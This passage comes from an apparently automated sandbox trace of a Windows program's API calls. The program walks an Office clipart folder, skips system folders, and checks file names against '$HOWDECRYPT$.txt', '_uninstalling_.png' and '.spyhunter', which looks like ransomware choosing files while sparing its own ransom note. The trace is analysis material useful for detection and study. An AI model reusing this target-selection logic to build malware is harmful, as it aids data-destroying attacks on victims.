returned 1 [0098.316] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.316] lstrcmpiW (lpString1="J0107730.WMF", lpString2="System Volume Information") returned -1 [0098.316] lstrlenW (lpString="System Volume Information") returned 25 [0098.316] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 67 [0098.316] StrStrIW (lpFirst="J0107730.WMF", lpSrch=".spyhunter") returned 0x0 [0098.317] lstrcmpW (lpString1="J0107730.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.317] lstrcmpW (lpString1="J0107730.WMF", lpString2="_uninstalling_.png") returned 1 [0098.317] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 67 [0098.317] GetProcessHeap () returned 0x2c0000 [0098.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c280d8 [0098.317] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2738) returned 0x2c16890 [0098.317] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.317] lstrcmpiW (lpString1="J0107734.WMF", lpString2="Windows") returned -1 [0098.317] lstrlenW (lpString="Windows") returned 7 [0098.317] lstrcmpiW (lpString1="J0107734.WMF", lpString2="$Recycle.bin") returned 1 [0098.317] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.317] lstrcmpiW (lpString1="J0107734.WMF", lpString2="System Volume Information") returned -1 [0098.317] lstrlenW (lpString="System Volume Information") returned 25 [0098.317] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 67 [0098.317] StrStrIW (lpFirst="J0107734.WMF", lpSrch=".spyhunter") returned 0x0 [0098.317] lstrcmpW (lpString1="J0107734.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.317] lstrcmpW (lpString1="J0107734.WMF", lpString2="_uninstalling_.png") returned 1 [0098.317] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 67 [0098.317] GetProcessHeap () returned 0x2c0000 [0098.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c281a8 [0098.317] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2740) returned 0x2c16890 [0098.317] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.317] lstrcmpiW (lpString1="J0107742.WMF", lpString2="Windows") returned -1 [0098.317] lstrlenW (lpString="Windows") returned 7 [0098.318] lstrcmpiW (lpString1="J0107742.WMF", lpString2="$Recycle.bin") returned 1 [0098.318] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.318] lstrcmpiW (lpString1="J0107742.WMF", lpString2="System Volume Information") returned -1 [0098.318] lstrlenW (lpString="System Volume Information") returned 25 [0098.318] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 67 [0098.318] StrStrIW (lpFirst="J0107742.WMF", lpSrch=".spyhunter") returned 0x0 [0098.318] lstrcmpW (lpString1="J0107742.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.318] lstrcmpW (lpString1="J0107742.WMF", lpString2="_uninstalling_.png") returned 1 [0098.318] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 67 [0098.318] GetProcessHeap () returned 0x2c0000 [0098.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28278 [0098.318] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2748) returned 0x2c16890 [0098.318] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.318] lstrcmpiW (lpString1="J0107744.WMF", lpString2="Windows") returned -1 [0098.318] lstrlenW (lpString="Windows") returned 7 [0098.318] lstrcmpiW (lpString1="J0107744.WMF", lpString2="$Recycle.bin") returned 1 [0098.318] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.318] lstrcmpiW (lpString1="J0107744.WMF", lpString2="System Volume Information") returned -1 [0098.318] lstrlenW (lpString="System Volume Information") returned 25 [0098.318] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 67 [0098.319] StrStrIW (lpFirst="J0107744.WMF", lpSrch=".spyhunter") returned 0x0 [0098.319] lstrcmpW (lpString1="J0107744.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.319] lstrcmpW (lpString1="J0107744.WMF", lpString2="_uninstalling_.png") returned 1 [0098.319] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 67 [0098.319] GetProcessHeap () returned 0x2c0000 [0098.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28348 [0098.319] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2750) returned 0x2c16890 [0098.319] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.319] lstrcmpiW (lpString1="J0107746.WMF", lpString2="Windows") returned -1 [0098.319] lstrlenW (lpString="Windows") returned 7 [0098.319] lstrcmpiW (lpString1="J0107746.WMF", lpString2="$Recycle.bin") returned 1 [0098.319] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.319] lstrcmpiW (lpString1="J0107746.WMF", lpString2="System Volume Information") returned -1 [0098.319] lstrlenW (lpString="System Volume Information") returned 25 [0098.319] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 67 [0098.319] StrStrIW (lpFirst="J0107746.WMF", lpSrch=".spyhunter") returned 0x0 [0098.319] lstrcmpW (lpString1="J0107746.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.319] lstrcmpW (lpString1="J0107746.WMF", lpString2="_uninstalling_.png") returned 1 [0098.319] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF") returned 67 [0098.319] GetProcessHeap () returned 0x2c0000 [0098.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28418 [0098.319] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2758) returned 0x2c16890 [0098.320] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.320] lstrcmpiW (lpString1="J0107748.WMF", lpString2="Windows") returned -1 [0098.320] lstrlenW (lpString="Windows") returned 7 [0098.320] lstrcmpiW (lpString1="J0107748.WMF", lpString2="$Recycle.bin") returned 1 [0098.320] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.320] lstrcmpiW (lpString1="J0107748.WMF", lpString2="System Volume Information") returned -1 [0098.320] lstrlenW (lpString="System Volume Information") returned 25 [0098.320] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 67 [0098.320] StrStrIW (lpFirst="J0107748.WMF", lpSrch=".spyhunter") returned 0x0 [0098.320] lstrcmpW (lpString1="J0107748.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.320] lstrcmpW (lpString1="J0107748.WMF", lpString2="_uninstalling_.png") returned 1 [0098.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107748.WMF") returned 67 [0098.320] GetProcessHeap () returned 0x2c0000 [0098.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c284e8 [0098.320] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2760) returned 0x2c16890 [0098.320] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.320] lstrcmpiW (lpString1="J0107750.WMF", lpString2="Windows") returned -1 [0098.320] lstrlenW (lpString="Windows") returned 7 [0098.320] lstrcmpiW (lpString1="J0107750.WMF", lpString2="$Recycle.bin") returned 1 [0098.320] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.320] lstrcmpiW (lpString1="J0107750.WMF", lpString2="System Volume Information") returned -1 [0098.320] lstrlenW (lpString="System Volume Information") returned 25 [0098.320] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 67 [0098.320] StrStrIW (lpFirst="J0107750.WMF", lpSrch=".spyhunter") returned 0x0 [0098.321] lstrcmpW (lpString1="J0107750.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.321] lstrcmpW (lpString1="J0107750.WMF", lpString2="_uninstalling_.png") returned 1 [0098.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107750.WMF") returned 67 [0098.321] GetProcessHeap () returned 0x2c0000 [0098.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c285b8 [0098.321] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2768) returned 0x2c16890 [0098.321] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.321] lstrcmpiW (lpString1="J0136865.WMF", lpString2="Windows") returned -1 [0098.321] lstrlenW (lpString="Windows") returned 7 [0098.321] lstrcmpiW (lpString1="J0136865.WMF", lpString2="$Recycle.bin") returned 1 [0098.321] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.321] lstrcmpiW (lpString1="J0136865.WMF", lpString2="System Volume Information") returned -1 [0098.321] lstrlenW (lpString="System Volume Information") returned 25 [0098.321] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 67 [0098.321] StrStrIW (lpFirst="J0136865.WMF", lpSrch=".spyhunter") returned 0x0 [0098.321] lstrcmpW (lpString1="J0136865.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.321] lstrcmpW (lpString1="J0136865.WMF", lpString2="_uninstalling_.png") returned 1 [0098.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0136865.WMF") returned 67 [0098.321] GetProcessHeap () returned 0x2c0000 [0098.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28688 [0098.321] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2770) returned 0x2c16890 [0098.321] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.321] lstrcmpiW (lpString1="J0144773.JPG", lpString2="Windows") returned -1 [0098.321] lstrlenW (lpString="Windows") returned 7 [0098.321] lstrcmpiW (lpString1="J0144773.JPG", lpString2="$Recycle.bin") returned 1 [0098.322] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.322] lstrcmpiW (lpString1="J0144773.JPG", lpString2="System Volume Information") returned -1 [0098.322] lstrlenW (lpString="System Volume Information") returned 25 [0098.322] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 67 [0098.322] StrStrIW (lpFirst="J0144773.JPG", lpSrch=".spyhunter") returned 0x0 [0098.322] lstrcmpW (lpString1="J0144773.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.322] lstrcmpW (lpString1="J0144773.JPG", lpString2="_uninstalling_.png") returned 1 [0098.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0144773.JPG") returned 67 [0098.322] GetProcessHeap () returned 0x2c0000 [0098.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28758 [0098.322] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2778) returned 0x2c16890 [0098.322] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.322] lstrcmpiW (lpString1="J0145168.JPG", lpString2="Windows") returned -1 [0098.322] lstrlenW (lpString="Windows") returned 7 [0098.322] lstrcmpiW (lpString1="J0145168.JPG", lpString2="$Recycle.bin") returned 1 [0098.322] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.322] lstrcmpiW (lpString1="J0145168.JPG", lpString2="System Volume Information") returned -1 [0098.322] lstrlenW (lpString="System Volume Information") returned 25 [0098.322] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 67 [0098.322] StrStrIW (lpFirst="J0145168.JPG", lpSrch=".spyhunter") returned 0x0 [0098.322] lstrcmpW (lpString1="J0145168.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.322] lstrcmpW (lpString1="J0145168.JPG", lpString2="_uninstalling_.png") returned 1 [0098.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145168.JPG") returned 67 [0098.322] GetProcessHeap () returned 0x2c0000 [0098.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28828 [0098.323] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2780) returned 0x2c16890 [0098.323] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.323] lstrcmpiW (lpString1="J0145212.JPG", lpString2="Windows") returned -1 [0098.323] lstrlenW (lpString="Windows") returned 7 [0098.323] lstrcmpiW (lpString1="J0145212.JPG", lpString2="$Recycle.bin") returned 1 [0098.323] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.323] lstrcmpiW (lpString1="J0145212.JPG", lpString2="System Volume Information") returned -1 [0098.323] lstrlenW (lpString="System Volume Information") returned 25 [0098.323] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 67 [0098.323] StrStrIW (lpFirst="J0145212.JPG", lpSrch=".spyhunter") returned 0x0 [0098.323] lstrcmpW (lpString1="J0145212.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.323] lstrcmpW (lpString1="J0145212.JPG", lpString2="_uninstalling_.png") returned 1 [0098.323] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 67 [0098.323] GetProcessHeap () returned 0x2c0000 [0098.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c288f8 [0098.323] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2788) returned 0x2c16890 [0098.323] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.323] lstrcmpiW (lpString1="J0145272.JPG", lpString2="Windows") returned -1 [0098.323] lstrlenW (lpString="Windows") returned 7 [0098.323] lstrcmpiW (lpString1="J0145272.JPG", lpString2="$Recycle.bin") returned 1 [0098.323] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.324] lstrcmpiW (lpString1="J0145272.JPG", lpString2="System Volume Information") returned -1 [0098.324] lstrlenW (lpString="System Volume Information") returned 25 [0098.324] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 67 [0098.324] StrStrIW (lpFirst="J0145272.JPG", lpSrch=".spyhunter") returned 0x0 [0098.324] lstrcmpW (lpString1="J0145272.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.324] lstrcmpW (lpString1="J0145272.JPG", lpString2="_uninstalling_.png") returned 1 [0098.324] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145272.JPG") returned 67 [0098.324] GetProcessHeap () returned 0x2c0000 [0098.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c289c8 [0098.324] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2790) returned 0x2c16890 [0098.324] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.358] lstrcmpiW (lpString1="J0145361.JPG", lpString2="Windows") returned -1 [0098.358] lstrlenW (lpString="Windows") returned 7 [0098.358] lstrcmpiW (lpString1="J0145361.JPG", lpString2="$Recycle.bin") returned 1 [0098.358] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.358] lstrcmpiW (lpString1="J0145361.JPG", lpString2="System Volume Information") returned -1 [0098.358] lstrlenW (lpString="System Volume Information") returned 25 [0098.358] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 67 [0098.358] StrStrIW (lpFirst="J0145361.JPG", lpSrch=".spyhunter") returned 0x0 [0098.358] lstrcmpW (lpString1="J0145361.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.358] lstrcmpW (lpString1="J0145361.JPG", lpString2="_uninstalling_.png") returned 1 [0098.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145361.JPG") returned 67 [0098.358] GetProcessHeap () returned 0x2c0000 [0098.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28828 [0098.358] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2778) returned 0x2c16890 [0098.358] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.358] lstrcmpiW (lpString1="J0145373.JPG", lpString2="Windows") returned -1 [0098.358] lstrlenW (lpString="Windows") returned 7 [0098.358] lstrcmpiW (lpString1="J0145373.JPG", lpString2="$Recycle.bin") returned 1 [0098.359] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.359] lstrcmpiW (lpString1="J0145373.JPG", lpString2="System Volume Information") returned -1 [0098.359] lstrlenW (lpString="System Volume Information") returned 25 [0098.359] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 67 [0098.359] StrStrIW (lpFirst="J0145373.JPG", lpSrch=".spyhunter") returned 0x0 [0098.359] lstrcmpW (lpString1="J0145373.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.359] lstrcmpW (lpString1="J0145373.JPG", lpString2="_uninstalling_.png") returned 1 [0098.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145373.JPG") returned 67 [0098.359] GetProcessHeap () returned 0x2c0000 [0098.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28a98 [0098.359] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2780) returned 0x2c16890 [0098.359] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.359] lstrcmpiW (lpString1="J0145669.JPG", lpString2="Windows") returned -1 [0098.359] lstrlenW (lpString="Windows") returned 7 [0098.359] lstrcmpiW (lpString1="J0145669.JPG", lpString2="$Recycle.bin") returned 1 [0098.359] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.359] lstrcmpiW (lpString1="J0145669.JPG", lpString2="System Volume Information") returned -1 [0098.359] lstrlenW (lpString="System Volume Information") returned 25 [0098.359] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 67 [0098.359] StrStrIW (lpFirst="J0145669.JPG", lpSrch=".spyhunter") returned 0x0 [0098.359] lstrcmpW (lpString1="J0145669.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.359] lstrcmpW (lpString1="J0145669.JPG", lpString2="_uninstalling_.png") returned 1 [0098.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145669.JPG") returned 67 [0098.359] GetProcessHeap () returned 0x2c0000 [0098.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28b68 [0098.360] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2788) returned 0x2c16890 [0098.360] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.360] lstrcmpiW (lpString1="J0145707.JPG", lpString2="Windows") returned -1 [0098.360] lstrlenW (lpString="Windows") returned 7 [0098.360] lstrcmpiW (lpString1="J0145707.JPG", lpString2="$Recycle.bin") returned 1 [0098.360] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.360] lstrcmpiW (lpString1="J0145707.JPG", lpString2="System Volume Information") returned -1 [0098.360] lstrlenW (lpString="System Volume Information") returned 25 [0098.360] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 67 [0098.360] StrStrIW (lpFirst="J0145707.JPG", lpSrch=".spyhunter") returned 0x0 [0098.360] lstrcmpW (lpString1="J0145707.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.360] lstrcmpW (lpString1="J0145707.JPG", lpString2="_uninstalling_.png") returned 1 [0098.360] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145707.JPG") returned 67 [0098.360] GetProcessHeap () returned 0x2c0000 [0098.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28c38 [0098.360] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2790) returned 0x2c16890 [0098.360] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.360] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 67 [0098.360] StrStrIW (lpFirst="J0145810.JPG", lpSrch=".spyhunter") returned 0x0 [0098.360] lstrcmpW (lpString1="J0145810.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.360] lstrcmpW (lpString1="J0145810.JPG", lpString2="_uninstalling_.png") returned 1 [0098.360] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145810.JPG") returned 67 [0098.361] GetProcessHeap () returned 0x2c0000 [0098.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28d08 [0098.361] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2798) returned 0x2c16890 [0098.361] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.361] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 67 [0098.361] StrStrIW (lpFirst="J0145879.JPG", lpSrch=".spyhunter") returned 0x0 [0098.361] lstrcmpW (lpString1="J0145879.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.361] lstrcmpW (lpString1="J0145879.JPG", lpString2="_uninstalling_.png") returned 1 [0098.361] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145879.JPG") returned 67 [0098.361] GetProcessHeap () returned 0x2c0000 [0098.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28dd8 [0098.361] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27a0) returned 0x2c16890 [0098.361] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.361] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 67 [0098.361] StrStrIW (lpFirst="J0145895.JPG", lpSrch=".spyhunter") returned 0x0 [0098.361] lstrcmpW (lpString1="J0145895.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.361] lstrcmpW (lpString1="J0145895.JPG", lpString2="_uninstalling_.png") returned 1 [0098.361] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145895.JPG") returned 67 [0098.361] GetProcessHeap () returned 0x2c0000 [0098.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28ea8 [0098.361] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27a8) returned 0x2c16890 [0098.361] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.361] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 67 [0098.362] StrStrIW (lpFirst="J0145904.JPG", lpSrch=".spyhunter") returned 0x0 [0098.362] lstrcmpW (lpString1="J0145904.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.362] lstrcmpW (lpString1="J0145904.JPG", lpString2="_uninstalling_.png") returned 1 [0098.362] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145904.JPG") returned 67 [0098.362] GetProcessHeap () returned 0x2c0000 [0098.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28f78 [0098.362] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27b0) returned 0x2c16890 [0098.362] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.362] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 67 [0098.362] StrStrIW (lpFirst="J0146142.JPG", lpSrch=".spyhunter") returned 0x0 [0098.362] lstrcmpW (lpString1="J0146142.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.362] lstrcmpW (lpString1="J0146142.JPG", lpString2="_uninstalling_.png") returned 1 [0098.362] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 67 [0098.362] GetProcessHeap () returned 0x2c0000 [0098.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29048 [0098.362] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x27b8) returned 0x2c16890 [0098.362] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.362] wnsprintfW (in: 